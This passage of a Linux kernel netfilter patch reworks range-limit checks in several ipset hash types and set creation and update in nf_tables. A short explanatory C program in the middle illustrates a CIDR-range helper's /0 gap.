+-		for (; p <= port_to; p++) {
++		for (; p <= port_to; p++, i++) {
+ 			e.ip = htonl(ip);
+ 			e.port = htons(p);
++			if (i > IPSET_MAX_RANGE) {
++				hash_ipport4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 			if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_ipportip.c b/net/netfilter/ipset/ip_set_hash_ipportip.c
+index 334fb1ad0e86c..39a01934b1536 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipportip.c
++++ b/net/netfilter/ipset/ip_set_hash_ipportip.c
+@@ -108,11 +108,11 @@ static int
+ hash_ipportip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		    enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipportip4 *h = set->data;
++	struct hash_ipportip4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipportip4_elem e = { .ip = 0 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip, ip_to = 0, p = 0, port, port_to;
++	u32 ip, ip_to = 0, p = 0, port, port_to, i = 0;
+ 	bool with_ports = false;
+ 	int ret;
+ 
+@@ -180,17 +180,18 @@ hash_ipportip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 			swap(port, port_to);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1)*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	for (; ip <= ip_to; ip++) {
+ 		p = retried && ip == ntohl(h->next.ip) ? ntohs(h->next.port)
+ 						       : port;
+-		for (; p <= port_to; p++) {
++		for (; p <= port_to; p++, i++) {
+ 			e.ip = htonl(ip);
+ 			e.port = htons(p);
++			if (i > IPSET_MAX_RANGE) {
++				hash_ipportip4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 			if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_ipportnet.c b/net/netfilter/ipset/ip_set_hash_ipportnet.c
+index 7df94f437f600..5c6de605a9fb7 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipportnet.c
++++ b/net/netfilter/ipset/ip_set_hash_ipportnet.c
+@@ -160,12 +160,12 @@ static int
+ hash_ipportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		     enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipportnet4 *h = set->data;
++	struct hash_ipportnet4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipportnet4_elem e = { .cidr = HOST_MASK - 1 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+ 	u32 ip = 0, ip_to = 0, p = 0, port, port_to;
+-	u32 ip2_from = 0, ip2_to = 0, ip2;
++	u32 ip2_from = 0, ip2_to = 0, ip2, i = 0;
+ 	bool with_ports = false;
+ 	u8 cidr;
+ 	int ret;
+@@ -253,9 +253,6 @@ hash_ipportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 			swap(port, port_to);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1)*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	ip2_to = ip2_from;
+ 	if (tb[IPSET_ATTR_IP2_TO]) {
+ 		ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP2_TO], &ip2_to);
+@@ -282,9 +279,15 @@ hash_ipportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		for (; p <= port_to; p++) {
+ 			e.port = htons(p);
+ 			do {
++				i++;
+ 				e.ip2 = htonl(ip2);
+ 				ip2 = ip_set_range_to_cidr(ip2, ip2_to, &cidr);
+ 				e.cidr = cidr - 1;
++				if (i > IPSET_MAX_RANGE) {
++					hash_ipportnet4_data_next(&h->next,
++								  &e);
++					return -ERANGE;
++				}
+ 				ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 				if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_net.c b/net/netfilter/ipset/ip_set_hash_net.c
+index 1422739d9aa25..ce0a9ce5a91f1 100644
+--- a/net/netfilter/ipset/ip_set_hash_net.c
++++ b/net/netfilter/ipset/ip_set_hash_net.c
+@@ -136,11 +136,11 @@ static int
+ hash_net4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	       enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_net4 *h = set->data;
++	struct hash_net4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_net4_elem e = { .cidr = HOST_MASK };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip = 0, ip_to = 0, ipn, n = 0;
++	u32 ip = 0, ip_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -188,19 +188,16 @@ hash_net4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		if (ip + UINT_MAX == ip_to)
+ 			return -IPSET_ERR_HASH_RANGE;
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr);
+-		n++;
+-	} while (ipn++ < ip_to);
+-
+-	if (n > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	do {
++		i++;
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_net4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr);
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 		if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_netiface.c b/net/netfilter/ipset/ip_set_hash_netiface.c
+index 9810f5bf63f5e..0310732862362 100644
+--- a/net/netfilter/ipset/ip_set_hash_netiface.c
++++ b/net/netfilter/ipset/ip_set_hash_netiface.c
+@@ -202,7 +202,7 @@ hash_netiface4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netiface4_elem e = { .cidr = HOST_MASK, .elem = 1 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip = 0, ip_to = 0, ipn, n = 0;
++	u32 ip = 0, ip_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -256,19 +256,16 @@ hash_netiface4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip, ip_to, e.cidr);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr);
+-		n++;
+-	} while (ipn++ < ip_to);
+-
+-	if (n > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	do {
++		i++;
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_netiface4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr);
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+diff --git a/net/netfilter/ipset/ip_set_hash_netnet.c b/net/netfilter/ipset/ip_set_hash_netnet.c
+index 3d09eefe998a7..c07b70bf32db4 100644
+--- a/net/netfilter/ipset/ip_set_hash_netnet.c
++++ b/net/netfilter/ipset/ip_set_hash_netnet.c
+@@ -163,13 +163,12 @@ static int
+ hash_netnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		  enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_netnet4 *h = set->data;
++	struct hash_netnet4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netnet4_elem e = { };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+ 	u32 ip = 0, ip_to = 0;
+-	u32 ip2 = 0, ip2_from = 0, ip2_to = 0, ipn;
+-	u64 n = 0, m = 0;
++	u32 ip2 = 0, ip2_from = 0, ip2_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -245,19 +244,6 @@ hash_netnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip2_from, ip2_to, e.cidr[1]);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr[0]);
+-		n++;
+-	} while (ipn++ < ip_to);
+-	ipn = ip2_from;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip2_to, &e.cidr[1]);
+-		m++;
+-	} while (ipn++ < ip2_to);
+-
+-	if (n*m > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried) {
+ 		ip = ntohl(h->next.ip[0]);
+@@ -270,7 +256,12 @@ hash_netnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		e.ip[0] = htonl(ip);
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr[0]);
+ 		do {
++			i++;
+ 			e.ip[1] = htonl(ip2);
++			if (i > IPSET_MAX_RANGE) {
++				hash_netnet4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ip2 = ip_set_range_to_cidr(ip2, ip2_to, &e.cidr[1]);
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 			if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_netport.c b/net/netfilter/ipset/ip_set_hash_netport.c
+index 09cf72eb37f8d..d1a0628df4ef3 100644
+--- a/net/netfilter/ipset/ip_set_hash_netport.c
++++ b/net/netfilter/ipset/ip_set_hash_netport.c
+@@ -154,12 +154,11 @@ static int
+ hash_netport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		   enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_netport4 *h = set->data;
++	struct hash_netport4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netport4_elem e = { .cidr = HOST_MASK - 1 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 port, port_to, p = 0, ip = 0, ip_to = 0, ipn;
+-	u64 n = 0;
++	u32 port, port_to, p = 0, ip = 0, ip_to = 0, i = 0;
+ 	bool with_ports = false;
+ 	u8 cidr;
+ 	int ret;
+@@ -236,14 +235,6 @@ hash_netport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip, ip_to, e.cidr + 1);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &cidr);
+-		n++;
+-	} while (ipn++ < ip_to);
+-
+-	if (n*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried) {
+ 		ip = ntohl(h->next.ip);
+@@ -255,8 +246,12 @@ hash_netport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		e.ip = htonl(ip);
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &cidr);
+ 		e.cidr = cidr - 1;
+-		for (; p <= port_to; p++) {
++		for (; p <= port_to; p++, i++) {
+ 			e.port = htons(p);
++			if (i > IPSET_MAX_RANGE) {
++				hash_netport4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 			if (ret && !ip_set_eexist(ret, flags))
+ 				return ret;
+diff --git a/net/netfilter/ipset/ip_set_hash_netportnet.c b/net/netfilter/ipset/ip_set_hash_netportnet.c
+index 19bcdb3141f6e..005a7ce87217e 100644
+--- a/net/netfilter/ipset/ip_set_hash_netportnet.c
++++ b/net/netfilter/ipset/ip_set_hash_netportnet.c
+@@ -173,17 +173,26 @@ hash_netportnet4_kadt(struct ip_set *set, const struct sk_buff *skb,
+ 	return adtfn(set, &e, &ext, &opt->ext, opt->cmdflags);
+ }
+ 
++static u32
++hash_netportnet4_range_to_cidr(u32 from, u32 to, u8 *cidr)
++{
++	if (from == 0 && to == UINT_MAX) {
++		*cidr = 0;
++		return to;
++	}
++	return ip_set_range_to_cidr(from, to, cidr);
++}
++
+ static int
+ hash_netportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		      enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_netportnet4 *h = set->data;
++	struct hash_netportnet4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netportnet4_elem e = { };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+ 	u32 ip = 0, ip_to = 0, p = 0, port, port_to;
+-	u32 ip2_from = 0, ip2_to = 0, ip2, ipn;
+-	u64 n = 0, m = 0;
++	u32 ip2_from = 0, ip2_to = 0, ip2, i = 0;
+ 	bool with_ports = false;
+ 	int ret;
+ 
+@@ -285,19 +294,6 @@ hash_netportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip2_from, ip2_to, e.cidr[1]);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr[0]);
+-		n++;
+-	} while (ipn++ < ip_to);
+-	ipn = ip2_from;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip2_to, &e.cidr[1]);
+-		m++;
+-	} while (ipn++ < ip2_to);
+-
+-	if (n*m*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried) {
+ 		ip = ntohl(h->next.ip[0]);
+@@ -310,13 +306,19 @@ hash_netportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 
+ 	do {
+ 		e.ip[0] = htonl(ip);
+-		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr[0]);
++		ip = hash_netportnet4_range_to_cidr(ip, ip_to, &e.cidr[0]);
+ 		for (; p <= port_to; p++) {
+ 			e.port = htons(p);
+ 			do {
++				i++;
+ 				e.ip[1] = htonl(ip2);
+-				ip2 = ip_set_range_to_cidr(ip2, ip2_to,
+-							   &e.cidr[1]);
++				if (i > IPSET_MAX_RANGE) {
++					hash_netportnet4_data_next(&h->next,
++								   &e);
++					return -ERANGE;
++				}
++				ip2 = hash_netportnet4_range_to_cidr(ip2,
++							ip2_to, &e.cidr[1]);
+ 				ret = adtfn(set, &e, &ext, &ext, flags);
+ 				if (ret && !ip_set_eexist(ret, flags))
+ 					return ret;
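
The hash_netportnet4_range_to_cidr() wrapper above apparently exists because
the underlying ip_set_range_to_cidr() helper never produces a /0 block (its
probe loop starts at /1 in the kernel sources), so the wrapper special-cases
the full 0..UINT_MAX range to emit a single /0 step. A self-contained
re-creation of the helper's shape that shows the gap (prefix_mask() and
range_to_cidr() here are approximations of the kernel helpers, not copies):

#include <stdint.h>
#include <stdio.h>

static uint32_t prefix_mask(uint8_t b)	/* netmask for a /b prefix */
{
	return b ? ~0U << (32 - b) : 0;
}

/* Emit the largest CIDR block that starts at @from and stays within
 * [@from, @to]; return its last address. Probing starts at /1, so a
 * /0 block can never be produced -- the gap the wrapper closes. */
static uint32_t range_to_cidr(uint32_t from, uint32_t to, uint8_t *cidr)
{
	uint8_t i;

	for (i = 1; i < 32; i++) {
		uint32_t last;

		if ((from & prefix_mask(i)) != from)
			continue;	/* @from not aligned to a /i block */
		last = from | ~prefix_mask(i);
		if (last <= to) {
			*cidr = i;
			return last;
		}
	}
	*cidr = 32;
	return from;
}

int main(void)
{
	uint8_t cidr;
	uint32_t last = range_to_cidr(0, UINT32_MAX, &cidr);

	/* Full IPv4 space comes back as a /1 (two steps), never as /0. */
	printf("first block: /%u, ends at %#x\n", cidr, last);
	return 0;
}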
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 7a09421f19e15..3ba8c291fcaa7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -465,8 +465,9 @@ static int nft_delrule_by_chain(struct nft_ctx *ctx)
+ 	return 0;
+ }
+ 
+-static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+-			     struct nft_set *set)
++static int __nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
++			       struct nft_set *set,
++			       const struct nft_set_desc *desc)
+ {
+ 	struct nft_trans *trans;
+ 
+@@ -474,17 +475,28 @@ static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+ 	if (trans == NULL)
+ 		return -ENOMEM;
+ 
+-	if (msg_type == NFT_MSG_NEWSET && ctx->nla[NFTA_SET_ID] != NULL) {
++	if (msg_type == NFT_MSG_NEWSET && ctx->nla[NFTA_SET_ID] && !desc) {
+ 		nft_trans_set_id(trans) =
+ 			ntohl(nla_get_be32(ctx->nla[NFTA_SET_ID]));
+ 		nft_activate_next(ctx->net, set);
+ 	}
+ 	nft_trans_set(trans) = set;
++	if (desc) {
++		nft_trans_set_update(trans) = true;
++		nft_trans_set_gc_int(trans) = desc->gc_int;
++		nft_trans_set_timeout(trans) = desc->timeout;
++	}
+ 	nft_trans_commit_list_add_tail(ctx->net, trans);
+ 
+ 	return 0;
+ }
+ 
++static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
++			     struct nft_set *set)
++{
++	return __nft_trans_set_add(ctx, msg_type, set, NULL);
++}
++
+ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	int err;
+@@ -3732,8 +3744,7 @@ static bool nft_set_ops_candidate(const struct nft_set_type *type, u32 flags)
+ static const struct nft_set_ops *
+ nft_select_set_ops(const struct nft_ctx *ctx,
+ 		   const struct nlattr * const nla[],
+-		   const struct nft_set_desc *desc,
+-		   enum nft_set_policies policy)
++		   const struct nft_set_desc *desc)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(ctx->net);
+ 	const struct nft_set_ops *ops, *bops;
+@@ -3762,7 +3773,7 @@ nft_select_set_ops(const struct nft_ctx *ctx,
+ 		if (!ops->estimate(desc, flags, &est))
+ 			continue;
+ 
+-		switch (policy) {
++		switch (desc->policy) {
+ 		case NFT_SET_POL_PERFORMANCE:
+ 			if (est.lookup < best.lookup)
+ 				break;
+@@ -3997,8 +4008,10 @@ static int nf_tables_fill_set_concat(struct sk_buff *skb,
+ static int nf_tables_fill_set(struct sk_buff *skb, const struct nft_ctx *ctx,
+ 			      const struct nft_set *set, u16 event, u16 flags)
+ {
+-	struct nlmsghdr *nlh;
++	u64 timeout = READ_ONCE(set->timeout);
++	u32 gc_int = READ_ONCE(set->gc_int);
+ 	u32 portid = ctx->portid;
++	struct nlmsghdr *nlh;
+ 	struct nlattr *nest;
+ 	u32 seq = ctx->seq;
+ 	int i;
+@@ -4034,13 +4047,13 @@ static int nf_tables_fill_set(struct sk_buff *skb, const struct nft_ctx *ctx,
+ 	    nla_put_be32(skb, NFTA_SET_OBJ_TYPE, htonl(set->objtype)))
+ 		goto nla_put_failure;
+ 
+-	if (set->timeout &&
++	if (timeout &&
+ 	    nla_put_be64(skb, NFTA_SET_TIMEOUT,
+-			 nf_jiffies64_to_msecs(set->timeout),
++			 nf_jiffies64_to_msecs(timeout),
+ 			 NFTA_SET_PAD))
+ 		goto nla_put_failure;
+-	if (set->gc_int &&
+-	    nla_put_be32(skb, NFTA_SET_GC_INTERVAL, htonl(set->gc_int)))
++	if (gc_int &&
++	    nla_put_be32(skb, NFTA_SET_GC_INTERVAL, htonl(gc_int)))
+ 		goto nla_put_failure;
+ 
+ 	if (set->policy != NFT_SET_POL_PERFORMANCE) {
+@@ -4341,15 +4354,94 @@ static int nf_tables_set_desc_parse(struct nft_set_desc *desc,
+ 	return err;
+ }
+ 
++static int nft_set_expr_alloc(struct nft_ctx *ctx, struct nft_set *set,
++			      const struct nlattr * const *nla,
++			      struct nft_expr **exprs, int *num_exprs,
++			      u32 flags)
++{
++	struct nft_expr *expr;
++	int err, i;
++
++	if (nla[NFTA_SET_EXPR]) {
++		expr = nft_set_elem_expr_alloc(ctx, set, nla[NFTA_SET_EXPR]);
++		if (IS_ERR(expr)) {
++			err = PTR_ERR(expr);
++			goto err_set_expr_alloc;
++		}
++		exprs[0] = expr;
++		(*num_exprs)++;
++	} else if (nla[NFTA_SET_EXPRESSIONS]) {
++		struct nlattr *tmp;
++		int left;
++
++		if (!(flags & NFT_SET_EXPR)) {
++			err = -EINVAL;
++			goto err_set_expr_alloc;
++		}
++		i = 0;
++		nla_for_each_nested(tmp, nla[NFTA_SET_EXPRESSIONS], left) {
++			if (i == NFT_SET_EXPR_MAX) {
++				err = -E2BIG;
++				goto err_set_expr_alloc;
++			}
++			if (nla_type(tmp) != NFTA_LIST_ELEM) {
++				err = -EINVAL;
++				goto err_set_expr_alloc;
++			}
++			expr = nft_set_elem_expr_alloc(ctx, set, tmp);
++			if (IS_ERR(expr)) {
++				err = PTR_ERR(expr);
++				goto err_set_expr_alloc;
++			}
++			exprs[i++] = expr;
++			(*num_exprs)++;
++		}
++	}
++
++	return 0;
++
++err_set_expr_alloc:
++	for (i = 0; i < *num_exprs; i++)
++		nft_expr_destroy(ctx, exprs[i]);
++
++	return err;
++}
++
++static bool nft_set_is_same(const struct nft_set *set,
++			    const struct nft_set_desc *desc,
++			    struct nft_expr *exprs[], u32 num_exprs, u32 flags)
++{
++	int i;
++
++	if (set->ktype != desc->ktype ||
++	    set->dtype != desc->dtype ||
++	    set->flags != flags ||
++	    set->klen != desc->klen ||
++	    set->dlen != desc->dlen ||
++	    set->field_count != desc->field_count ||
++	    set->num_exprs != num_exprs)
++		return false;
++
++	for (i = 0; i < desc->field_count; i++) {
++		if (set->field_len[i] != desc->field_len[i])
++			return false;
++	}
++
++	for (i = 0; i < num_exprs; i++) {
++		if (set->exprs[i]->ops != exprs[i]->ops)
++			return false;
++	}
++
++	return true;
++}
++
+ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 			    const struct nlattr * const nla[])
+ {
+-	u32 ktype, dtype, flags, policy, gc_int, objtype;
+ 	struct netlink_ext_ack *extack = info->extack;
+ 	u8 genmask = nft_genmask_next(info->net);
+ 	u8 family = info->nfmsg->nfgen_family;
+ 	const struct nft_set_ops *ops;
+-	struct nft_expr *expr = NULL;
+ 	struct net *net = info->net;
+ 	struct nft_set_desc desc;
+ 	struct nft_table *table;
+@@ -4357,10 +4449,11 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	struct nft_set *set;
+ 	struct nft_ctx ctx;
+ 	size_t alloc_size;
+-	u64 timeout;
++	int num_exprs = 0;
+ 	char *name;
+ 	int err, i;
+ 	u16 udlen;
++	u32 flags;
+ 	u64 size;
+ 
+ 	if (nla[NFTA_SET_TABLE] == NULL ||
+@@ -4371,10 +4464,10 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	memset(&desc, 0, sizeof(desc));
+ 
+-	ktype = NFT_DATA_VALUE;
++	desc.ktype = NFT_DATA_VALUE;
+ 	if (nla[NFTA_SET_KEY_TYPE] != NULL) {
+-		ktype = ntohl(nla_get_be32(nla[NFTA_SET_KEY_TYPE]));
+-		if ((ktype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK)
++		desc.ktype = ntohl(nla_get_be32(nla[NFTA_SET_KEY_TYPE]));
++		if ((desc.ktype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK)
+ 			return -EINVAL;
+ 	}
+ 
+@@ -4399,17 +4492,17 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 	}
+ 
+-	dtype = 0;
++	desc.dtype = 0;
+ 	if (nla[NFTA_SET_DATA_TYPE] != NULL) {
+ 		if (!(flags & NFT_SET_MAP))
+ 			return -EINVAL;
+ 
+-		dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
+-		if ((dtype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK &&
+-		    dtype != NFT_DATA_VERDICT)
++		desc.dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
++		if ((desc.dtype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK &&
++		    desc.dtype != NFT_DATA_VERDICT)
+ 			return -EINVAL;
+ 
+-		if (dtype != NFT_DATA_VERDICT) {
++		if (desc.dtype != NFT_DATA_VERDICT) {
+ 			if (nla[NFTA_SET_DATA_LEN] == NULL)
+ 				return -EINVAL;
+ 			desc.dlen = ntohl(nla_get_be32(nla[NFTA_SET_DATA_LEN]));
+@@ -4424,34 +4517,34 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (!(flags & NFT_SET_OBJECT))
+ 			return -EINVAL;
+ 
+-		objtype = ntohl(nla_get_be32(nla[NFTA_SET_OBJ_TYPE]));
+-		if (objtype == NFT_OBJECT_UNSPEC ||
+-		    objtype > NFT_OBJECT_MAX)
++		desc.objtype = ntohl(nla_get_be32(nla[NFTA_SET_OBJ_TYPE]));
++		if (desc.objtype == NFT_OBJECT_UNSPEC ||
++		    desc.objtype > NFT_OBJECT_MAX)
+ 			return -EOPNOTSUPP;
+ 	} else if (flags & NFT_SET_OBJECT)
+ 		return -EINVAL;
+ 	else
+-		objtype = NFT_OBJECT_UNSPEC;
++		desc.objtype = NFT_OBJECT_UNSPEC;
+ 
+-	timeout = 0;
++	desc.timeout = 0;
+ 	if (nla[NFTA_SET_TIMEOUT] != NULL) {
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
+ 
+-		err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &timeout);
++		err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &desc.timeout);
+ 		if (err)
+ 			return err;
+ 	}
+-	gc_int = 0;
++	desc.gc_int = 0;
+ 	if (nla[NFTA_SET_GC_INTERVAL] != NULL) {
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
+-		gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
++		desc.gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
+ 	}
+ 
+-	policy = NFT_SET_POL_PERFORMANCE;
++	desc.policy = NFT_SET_POL_PERFORMANCE;
+ 	if (nla[NFTA_SET_POLICY] != NULL)
+-		policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));
++		desc.policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));
+ 
+ 	if (nla[NFTA_SET_DESC] != NULL) {
+ 		err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]);
+@@ -4483,6 +4576,8 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return PTR_ERR(set);
+ 		}
+ 	} else {
++		struct nft_expr *exprs[NFT_SET_EXPR_MAX] = {};
++
+ 		if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
+ 			return -EEXIST;
+@@ -4490,13 +4585,29 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
+ 			return -EOPNOTSUPP;
+ 
+-		return 0;
++		err = nft_set_expr_alloc(&ctx, set, nla, exprs, &num_exprs, flags);
++		if (err < 0)
++			return err;
++
++		err = 0;
++		if (!nft_set_is_same(set, &desc, exprs, num_exprs, flags)) {
++			NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
++			err = -EEXIST;
++		}
++
++		for (i = 0; i < num_exprs; i++)
++			nft_expr_destroy(&ctx, exprs[i]);
++
++		if (err < 0)
++			return err;
++
++		return __nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set, &desc);
+ 	}
+ 
+ 	if (!(info->nlh->nlmsg_flags & NLM_F_CREATE))
+ 		return -ENOENT;
+ 
+-	ops = nft_select_set_ops(&ctx, nla, &desc, policy);
++	ops = nft_select_set_ops(&ctx, nla, &desc);
+ 	if (IS_ERR(ops))
+ 		return PTR_ERR(ops);
+ 
+@@ -4536,18 +4647,18 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	set->table = table;
+ 	write_pnet(&set->net, net);
+ 	set->ops = ops;
+-	set->ktype = ktype;
++	set->ktype = desc.ktype;
+ 	set->klen = desc.klen;
+-	set->dtype = dtype;
+-	set->objtype = objtype;
++	set->dtype = desc.dtype;
++	set->objtype = desc.objtype;
+ 	set->dlen = desc.dlen;
+ 	set->flags = flags;
+ 	set->size = desc.size;
+-	set->policy = policy;
++	set->policy = desc.policy;
+ 	set->udlen = udlen;
+ 	set->udata = udata;
+-	set->timeout = timeout;
+-	set->gc_int = gc_int;
++	set->timeout = desc.timeout;
++	set->gc_int = desc.gc_int;
+ 
+ 	set->field_count = desc.field_count;
+ 	for (i = 0; i < desc.field_count; i++)
+@@ -4557,43 +4668,11 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (err < 0)
+ 		goto err_set_init;
+ 
+-	if (nla[NFTA_SET_EXPR]) {
